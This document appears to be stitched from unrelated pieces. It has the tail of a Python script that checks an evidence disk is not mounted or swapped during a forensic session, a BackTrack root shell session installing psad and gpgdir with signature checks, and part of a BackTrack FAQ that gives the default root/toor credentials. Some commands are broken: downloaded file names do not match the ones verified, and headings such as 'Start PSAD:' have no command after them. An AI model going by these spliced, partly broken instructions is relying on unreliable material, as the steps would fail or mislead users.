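               "/dev/sdb2                               partition\t1048572\t0\t-1\n")
CLEAN_MOUNTS = "/dev/sda1 / ext4 rw,relatime 0 0\n"
CLEAN_SWAPS = "Filename\t\t\t\tType\t\tSize\tUsed\tPriority\n"


def make_sample_image(size: int = 64 * 1024) -> str:
    """Write a throwaway file that plays the role of the evidence device."""
    fd, path = tempfile.mkstemp(suffix=".img")
    with os.fdopen(fd, "wb") as fh:
        fh.write(os.urandom(size))
    return path


if __name__ == "__main__":
    image = make_sample_image()
    before = hash_device(image)
    print("evidence disk lines on the dirty host:", device_in_use("/dev/sdb", DIRTY_MOUNTS, DIRTY_SWAPS))
    print("clean host, after session:", verify_session(image, before, CLEAN_MOUNTS, CLEAN_SWAPS))
    os.remove(image)
```

On a real system, take the before hash from another trusted boot medium, call read_proc_state() right after booting BackTrack in forensic mode and again before shutdown, and treat any non-empty in_use list as a failed test regardless of whether the hashes still match.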
root@bt:~# cd /usr/local/src
root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2
root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2.md5
root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2.asc
root@bt: /usr/local/src# wget http://cipherdyne.org/public_key
root@bt: /usr/local/src# md5sum -c psad-2.1.7.tar.bz2.md5
psad-2.1.7.tar.bz2: OK
root@bt: /usr/local/src# gpg --import public_key
root@bt: /usr/local/src# gpg --verify psad-2.1.7.tar.bz2.asc
#gpg: Signature made Wed 14 Jul 2010 06:01:06 PM EDT using DSA key ID 0D3E7410
#gpg: Good signature from "Michael Rash (Signing key for cipherdyne.org projects) <mbr@cipherdyne.org>"
Install PSAD:
root@bt: /usr/local/src# tar xfj psad-2.1.7.tar.bz2
root@bt: /usr/local/src# cd psad-2.1.7
root@bt: /usr/local/src/psad-2.1.7# ./install.pl
#
# Would you like to install the latest signatures from http://www.cipherdyne.org/psad/signatures (y/n)? y
Start PSAD:
To fix this we will need to edit psad.conf, located in /etc/psad/, and add an email address as follows:
root@bt:~# cd /usr/local/src/
root@bt: /usr/local/src# mkdir gpgdir
root@bt: /usr/local/src# cd gpgdir/
root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc
root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/public_key
root@bt: /usr/local/src/gpgdir# gpg --import public_key
root@bt: /usr/local/src/gpgdir# gpg --verify gpgdir-1.9.5.tar.bz2.asc
Install gpgdir:
root@bt: /usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2
root@bt: /usr/local/src/gpgdir# cd gpgdir-1.9.5
root@bt: /usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl
BackTrack Frequently Asked Questions
I've just installed BackTrack, what is the root password?
The Ubiquity installer uses the username "root" and the password "toor" by default. We recommend you change this as soon as you have rebooted and verified that everything is working properly. You can do this by issuing the following command and following the prompts:
passwd root
Why does my keyboard stop working when I try to type the password?
It doesn't, your keyboard is still working. When you type your password in BackTrack, nothing is shown on the screen. This is a security measure to prevent someone from "shoulder surfing" and being able to see how long your password is, thereby making it more difficult for someone who knows you to guess your password.
startx
Why can't I just add the BackTrack repositories to my Ubuntu install, or the Ubuntu repositories to my BackTrack install?
We highly recommend against this, because the BackTrack tools are built with many custom features, libraries and a custom kernel. We have no way of knowing how they will perform on a non-BackTrack distribution, and you will very quickly break your install. Likewise, if you add the Ubuntu repositories to your BackTrack install, you will almost certainly break your entire BackTrack install very quickly. We do a lot of testing to ensure that all packages in our repo work together without causing problems. If you decide on this course of action you do so entirely at your own risk, and the BackTrack team will not offer any support.
Why don't you provide a USB image like you did with previous versions?
Previous versions required sometimes quite complicated methods to install to a USB stick, so for convenience we provided special images for easy installation. With the latest editions of BackTrack we have eliminated this need as it can easily be installed to a USB stick with tools such as Unetbootin or via manual methods as described in the Installation section of this site.
BackTrack is a highly specialized distro, where a lot of normal tasks are not done automatically for you as they are in a mainstream distro. Our best advice, if you wish to start off using Linux with BackTrack as your first Linux operating system, is: don't. Start by downloading a copy of Kubuntu (as it is a similar base operating system to BackTrack), boot into that, and force yourself to do everything you are used to doing on a daily basis using it, preferably spending most of your time with the command line tools. When, and only when, you can perform all of those daily tasks without having to look up the commands should you move to BackTrack. Please don't take this as us saying you shouldn't use BackTrack; take it as friendly advice that you are letting yourself in for a whole world of pain and frustration if you are not fully comfortable administering your own Linux machine before you start with BackTrack.
I have just downloaded and installed the latest version of BackTrack, do I still need to update?
Although you have downloaded the latest release of the ISO or VM, this does not mean you have the latest packages we provide. BackTrack is developed and updated on a continual basis, and for this reason you should still update your installation at regular intervals to keep up to date with the latest packages, bug fixes and new tools.
When and how often do you update the BackTrack repo with new packages?
Generally the BackTrack repo is updated with the week's new packages late on a Sunday night, so that they are available to you on Monday morning. There are times, however, when we feel that a package needs to be released straight away rather than waiting for the next scheduled Sunday repo update, so in those cases the repo update can happen at any time, day or night, during the week. Please note that while the repo is being synced it will be unavailable for downloading packages. This process doesn't take long, so it will be rare for this to cause more than a very short period of unavailability.
Where can I find a complete list of all the tools installed in BackTrack?
No such resource currently exists, however you can see a list of all packages installed on your BackTrack system by running:
dpkg --list
Please remember that this will list all of the packages installed on BackTrack, not just the tools. You can also search the repository for a particular package of interest by running the following command:
apt-cache search <keyword of interest>